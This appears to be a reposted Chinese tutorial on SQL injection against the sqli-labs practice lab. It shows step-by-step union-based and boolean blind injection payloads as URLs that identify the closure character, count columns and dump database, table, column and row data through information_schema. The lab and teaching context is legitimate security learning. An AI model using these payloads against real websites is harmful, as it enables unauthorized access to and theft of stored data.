SQL注入--联合查询+布尔盲注

Posted 烫烫烫烫烫烫烫烫

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL注入--联合查询+布尔盲注相关的知识,希望对你有一定的参考价值。

一. 联合查询

  1. 通过F12查看真实请求,找到注入点

  2. 判断后台查询语句中接收的参数的类型,并确定字符型参数的闭合符

    (1) 如果可以运算,即为数字型

    如输入以下语句,判断与直接输入id=1结果是否相同,判断是否可以运算。

    http://192.168.43.129/sqli-labs/Less-1/?id=2-1

    (2) 如果不能运算,则为字符型。

    此时需要确定闭合符,并在后续需要在每一个sql语句最后加上%23(#)用于注释掉原来的闭合符。

    首先尝试输入'或“,

    http://192.168.43.129/sqli-labs/Less-1/?id=2'

    如果有报错信息,就查看输入的字符后面的字符串,即为闭合符。

  3. 用order by判断字段数

    order by后面的参数为用于排序的列号,也就是说在该参数小于字段数时,前端能够拉到数据;大于字段数时,前端将会收到报错。因此通过二分法逼近字段数,并观察前端的显示,在最后得到结果,如:

    http://192.168.43.129/sqli-labs/Less-1/?id=1' order by 5#
  4. 将查询的id值设为无对应记录的值,开始使用union联合查询

    information_schema是mysql自带一个数据库,它提供的元数据(即数据库、表、列等信息)的访问方式。

    (1) 任意输入联合查询判断显示位。如:

    http://192.168.43.129/sqli-labs/Less-1/?id=-1union select 1,2,3#

    根据1,2,3中被前端显示的数字就能判断显示位。

    (2) 用database()查询库名

    http://192.168.43.129/sqli-labs/Less-1/?id=-1union select 1,database(),3#

    (3) 在information_schema .tables查询表名

    http://192.168.43.129/sqli-labs/Less-1/?id=-1union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = databaseName#

    (4) 在information_schema .columns查询字段名

    http://192.168.43.129/sqli-labs/Less-1/?id=-1union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = databaseName and table_name = tableName#

    (5) 根据查到的表名和字段名查询信息

    http://192.168.43.129/sqli-labs/Less-1/?id=-1union select 1,group_concat(col1),group_concat(col2) from tableName#


二. 布尔盲注

  1. 判断后台查询语句中接收的参数的类型,并确定字符型参数的闭合符

  2. 前面和上面一致,闭合符判断的方法稍有不同。首先尝试用’和”闭合,如果前端没有显示证明报错了,也就是说闭合符中含有该符号;如果显示了,证明没有报错,也就是闭合符中不含该符号。然后在报错的语句后面加上#,尝试,有显示证明该符号就是闭合符,没显示就在该符号后面逐个添加圆括号,直到不报错。

    如:

    http://192.168.43.129/sqli-labs/Less-8/?id=2'#
    http://192.168.43.129/sqli-labs/Less-8/?id=2')#


  3. 布尔盲注

    构造布尔条件,用and与原本在前端有显示的查询语句连接,有显示,该条件为真;无显示,该条件为假。以此用二分法逼近字符串的长度和字符的ascii码,从而得出库名、表名等一系列信息。

    如:

    http://192.168.43.129/sqli-labs/Less-8/?id=2' and length(database())>8#
    http://192.168.43.129/sqli-labs/Less-8/?id=2' and ascii(substring(database(),2,1))>101#

以上是关于SQL注入--联合查询+布尔盲注的主要内容,如果未能解决你的问题,请参考以下文章

MYSQL手工注入(详细步骤)—— 待补充

SQl注入的分类

SQL 注入(SQL Injection)学习心得

墨者靶场 SQL注入漏洞测试(布尔盲注)

墨者靶场 SQL注入漏洞测试(布尔盲注)

SQL注入攻击大全